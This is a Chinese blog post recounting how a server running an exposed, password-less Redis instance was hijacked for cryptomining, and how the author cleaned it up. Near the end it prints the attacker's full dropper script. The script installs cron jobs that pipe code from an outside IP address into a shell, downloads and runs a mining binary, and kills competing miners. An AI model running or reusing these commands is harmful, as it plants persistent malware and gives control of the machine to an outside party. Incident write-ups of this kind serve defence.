2. 程式人生 > >記一次服務器被挖礦經歷與解決辦法

記一次服務器被挖礦經歷與解決辦法

阿新 發佈:2018-07-31
alt boot 告警 port 下載 被黑 rep $2 nano

記一次服務器被挖礦經歷與解決辦法




在最近的某一天裏面,中午的一個小息過後,突然手機的郵件和公眾號監控zabbix的告警多了起來。我拿起手機一看原來是某臺服務器上的CPU跑滿了,就開始登上去看一下是哪個腳本導致負荷高的(在期間使用top -d 1命令查看負荷占用情況)。可以靜下來想了下,中午大家都在休息不應該CPU負載會這麽高的,心裏想80%是服務器被黑了。

技術分享圖片

後來發現是/tmp/ddgs.3013和/tmp/qW3xT.2這兩個文件跑滿了服務器CPU,後來決定先kill掉文件PID和刪除/tmp目錄下的文件,發現一刪除就自動創建上了,怎麽刪除也不能解決掉。經過一系列的查找問題之後發現了crontab上把以前配置都覆蓋掉了加上了一條(/5
* wget -q -O- http://165.225.157.157:8000/i.sh | sh)下載一個腳本的命令,但是第一時間就想到服務器被黑了。因為第一次遇見的原因當時心裏“小鹿亂轉”,後來查了點資料和問了一些同行才知道原來服務器被挖礦了,在度娘裏面搜索到的很嚇人。

技術分享圖片




既然已經知道了是被什麽gongji(51這也算是敏感字??)的了,也排查到它是經過掃描到我redis端口來黑的,那就對癥下藥吧!

  • 先在防火墻上設置redis端口限制在內網
    技術分享圖片

  • 在排查下redis是否有設置密碼

    vim  /usr/local/redis/redis.conf
requirepass yourpassword

  • 清除crontab的配置

    echo > /var/spool/cron/root
# 或者
systemctl stop crond

  • kill掉占用CPU高的兩個文件

    ps -ef | grep /tmp/ddgs.3013 | awk ‘{print $2}‘ | xargs kill -9
ps -ef | grep /tmp/qW3xT.2 | awk ‘{print $2}‘ | xargs kill -9

  • 最後一步刪除/tmp目錄下兩個文件

    rm -rf /tmp/ddgs.3013
rm -rf /tmp/qW3xT.2

    慢慢負載才降了下來,真的是心驚膽戰啊,睡個覺就出現被挖礦的問題!後來回想了一下出現這種問題不外乎兩種

  • 1、把redis端口暴露在外網
  • 2、redis沒設置密碼(因為本人是測試環境,偷了下懶沒設置密碼)

    本人很不才兩種錯誤都犯了,也特此提醒自己以後這種錯誤別在犯了。最後提供上這個腳本的具體內容:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk ‘{print $2}‘ | xargs kill

記一次服務器被挖礦經歷與解決辦法

相關推薦

服務經歷解決辦法

alt boot 告警 port 下載 被黑 rep $2 nano 記一次服務器被挖礦經歷與解決辦法 在最近的某一天裏面,中午的一個小息過後,突然手機的郵件和公眾號監控zabbix的告警多了起來。我拿起手機一看原來是某臺服務器上的CPU跑滿了,就開始登上去看一下是哪

服務的處理解決過程

amp 命令 刪除 root密碼 pos 服務器 exc 感染 oot 內網一臺服務器cpu爆滿,第6感猜測中了挖礦病毒,以下為cpu爆滿監控圖表趕緊ssh進系統,top了下,一個./x3e536747 進程占用了大量的cpu,cpu load average超過了cpu內

服務抓去事件

加強 grep top fin 是個 過程 不可 暴力破解 cpu 某天,一臺服務器cpu占用高達96%, 好吧,這種情況當然要看看是哪個進程占用的了,top查看進程發現是一個 ls_linux 的進程高居榜首,但是自己知道該服務器上沒運行過此種服務的,所以斷定可能是被抓去

服務入侵的調查取證

TP 應用 html mon down 幾分鐘 log 一個 elf文件 0×1 事件描述 小Z所在公司的信息安全建設還處於初期階段,而且只有小Z新來的一個信息安全工程師,所以常常會碰到一些疑難問題。一天,小Z接到運維同事的反映,一臺tomcat 的web服務器雖然安裝了殺

服務攻擊事件

不用 時間 edi 能夠 hist 幹凈 col nbsp ssh key 病毒清除 事情都解決了好多天,今天來總結一下,那天開發問數據備份沒有沒有拉到他們的那臺服務器上,於是乎就去看了一下為什麽定時任務沒有執行,看了之後,waht???我的定時任務全部沒了,NND 定時任

服務勒索!

bitcoin str ftp ron rrd support width 當我 一個 Hi, please view here: http://pastebin.com/raw/jtSjmJzS for information on how to obtain your

阿裏雲服務怎麽解決

對數 發生 數字 字母 roc -o shadow 打補丁 thinkphp 春節剛開始,我們SINE安全,發布了2018年服務器被挖礦的整體安全分析報告。該安全報告主要是以我們去年的整一年的安全數據為基礎,對這些服務器的被挖礦的整體情況進行了詳細的安全分析,為站長以及一些

悲慘的經歷

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:500(Ms08067實驗室成員)` ###一、事件起因   上週想著部署一個分散式檔案系統,我就在阿里雲上申請了一臺機器,部署了docker並安裝Simpledfs,可不想剛雲主機剛配置沒兩天,就發現機器的cpu使用率飆

服務IO過高處理過程

linux 服務器 緩沖區 io負載 記一次服務器IO過高處理過程 一、背景 在一次上線升級後,發現兩臺tomcat服務器的IOwait一直超過100ms,高峰時甚至超過300ms,檢查服務器發現CPU負載,內存的使用率都不高。問題可能出現在硬盤讀寫,而且那塊硬盤除了寫日誌外,沒有其他

服務Tomcat優化經歷

type tomcat優化 ext stream jpg 試用 ros index ctp 博主原創,轉載請註明。 公司需要一臺測試服務器來做測試用,所以花了幾天時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,運

記錄服務攻擊

服務器 攻擊 肉雞 公司一臺服務器從某一個時間開始,突然在每天不定期出現磁盤io和進程數的告警,初期進行查看,並未發現問題,暫時擱置。 每次告警時間都很短暫,所以很難在系統出現告警時登錄查看。而且由於在忙其他事情,這件事也一直沒有仔細去查。 登錄檢查的時候發現有一個分區磁盤滿了

阿裏雲服務病毒minerd入侵的解決方法

minerd 挖礦病毒 挖礦程序 木馬 早晨上班像往常一樣對服務器進行例行巡檢,發現一臺阿裏雲服務器的CPU的資源占用很高,到底是怎麽回事呢,趕緊用top命令查看了一下,發現是一個名為minerd的進程占用了很高的CPU資源,minerd之前聽說過,是一種挖礦病毒,沒有想到我負責的服務器會中這

手動清理Linux病毒

pan fff 殺毒軟件 win10 ado top 根據 部門 enter 時間:2018年5月16日起因:某公司的運維人員在綠盟的IPS上監測到有挖"門羅幣"的惡意事件,受影響的機器為公司的大數據服務器以及其他Linux服務器。我也是趕鴨子上架第一次

服務

base64 使用 一次 ssl url func 清理 nta fig 查看哪個進程占據cup   通過 top 或者使用 ps aux 我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看,裏面也加

服務生成Excel在客戶端下載的案例

停止 stream posit quest enc url Coding 不能 dstream 今天加盟部校長說做一個用戶數據收集並導出Excel文件的小網頁,主要便於查看客戶信息,前期一切順利,就在生成Excel和下載的時候出現了問題,收集了一些資料,有人說用NPOI插件

服務inodes數報警的事件

tab mic fin 占用 ron find crontab spa 形式 1 # df -i 執行以上命令,發現/上的 inodes 占用率為81%,於是開始處理。 首先找出哪個目錄底下文件數最多: 1 # cd / 2 # for i in $(ls);do e

服務******該怎麽處理

怎麽 內置 sin ext 開啟 roo 服務器 linux c color 正月裏來是新年,剛開始上班我們SINE安全團隊,首次挖掘發現了一種新的挖礦***,感染性極強,穿透內網,自動嘗試***服務器以及其他網站,通過我們一系列的追蹤,發現了***者的特征,首先使用thi

生產主機中病毒"kintegrityds"處理過程!

scan 告警 and 下載 clamscan linu conn 自動 out 【記一次生產挖礦病毒處理過程】: 可能性:webaap用戶密碼泄露、Jenkins/redis弱口令等。 1、監控到生產主機一直load告警 2、進服務器 top查看進程,發現挖礦病毒進

服務忘記root密碼的總結

步驟 tocken 使用 passwd命令 成功 需要 忘記root密碼 fff images 案例:服務器忘記root密碼無法進入系統 相關參數 single =>單用戶模式passwd =>

檢視檔案刪除的經歷

history | grep rm 發現沒有人最近做刪除,那麼就是程式刪除。 檢視資料夾(logs)最近修改時間:ls -al logs   檢視系統磁碟資訊 df -h 發現系統的掛載目錄是:/dev/sdal 使用:debugfs  open /dev/sda